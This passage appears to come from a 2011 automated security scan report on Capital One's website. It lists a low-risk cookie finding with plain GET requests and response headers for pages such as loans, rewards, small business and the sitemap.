HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:37 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D1; expires=Thu, 02-Feb-2012 22:12:37 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 37509
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Capit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loans/?linkid=WWW_1009_PERS_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_14_T_LNHPR HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:23 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:23 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 22518
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Capital One offer ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /onlinebanking/overview.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:36 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:36 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 23649
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title> Capi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personalloans/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:27 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:27 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 21748
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Personal Loans: A ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /protection/privacy/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:36 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:36 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 23417
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Capit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /protection/security/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:37 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:37 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 26756
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Capit ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /redirect.php?Log=1&linkid=WWW_1009_CARD_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_04_T_EXP&dest=https://cardfinder.capitalone.com/CapOne/findMyOffer.do?ex=R&pr=&id=&tg=4 HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 302 Found Date: Wed, 02 Feb 2011 22:11:48 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=f9be28ebS04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3PjmqKSgtyQ1OKS9KL80gKgNkuILkNDoEagojygcQA%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Location: https://cardfinder.capitalone.com/CapOne/findMyOffer.do?ex=R&pr=&id=&tg=20&pnt=ZZZZ00ZZZZZZZZZZZZZZ&ch=UNS&wtg=11 Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Content-Length: 1 Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rewards/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:50 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:11:50 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 26772
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Credi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rewards/service-login.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:49 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:11:49 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 20960
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>No Ha ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitemap/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:34 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:34 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 42178
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Capital One - Sit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /smallbusiness/?linkid=WWW_1009_SBUS_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_17_T_SB1 HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:58 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=W9HtNJWTnQGllch3pXxkL3TKXyJwhGLCl9P3xbFCLfrvYFRq9yh6!1941958184; path=/ Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDczMzMwV2VhL3Q4TFdITkRvMHhDTW9rRWFRPT0=; expires=Tuesday, 21-Feb-2079 01:26:05 GMT Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:58 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 59681
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Browse our small business banking products includin ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /smallbusiness/business-money-market/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:00 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=cgfmNJWQcJvjTlBLWy8QTQF18zjDLG9y6zLG2jyvTXxr2jFQ7lYV!-1710325866; path=/ Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDU0MDhDdmtVV0dvb0VzajAvTTlLUXNyc1pnPT0=; expires=Tuesday, 21-Feb-2079 01:26:07 GMT Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:12:00 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 60850
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Open Capital One Direct Banking Savings accounts: B ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /smallbusiness/cards/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:53 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=XLwQNJWJ5GYGgnZ0NkdH6V6RyJygf7d1Bh1GGL0MF5G5nX3rNBYX!-201819150; path=/ Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNTExMDJialJRVlVqUDEwS3ZWOXRwQytlYytRPT0=; expires=Tuesday, 21-Feb-2079 01:26:00 GMT Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:53 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 68542
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Browse business credit cards online and apply for C ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /smallbusiness/cards/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:57 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=FbpnNJWNTkZPPVyCtR9T3vhQFrHc45TyPPQ2LmGLKGmK8b3yr5XQ!1025162061; path=/ Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDkzMDR1bFp4Rmh3TlZLcVFyL2JUZVJYcE9nPT0=; expires=Tuesday, 21-Feb-2079 01:26:04 GMT Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:57 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 68542
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Browse business credit cards online and apply for C ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /smallbusiness/payroll/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:58 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=1LyBNJWTQDvpxXPth7p4yrMGr417XqLXvtLTJNWJDPZwntqtXcTX!-1660665105; path=/ Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxMzk3OTRxNlVsM2hObzczWFlhQ2ZPV01ZajF3PT0=; expires=Tuesday, 21-Feb-2079 01:26:05 GMT Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:58 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 49209
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Business Payroll (SM) - Capital One"/><meta name="k ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.capitalone.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000
Response
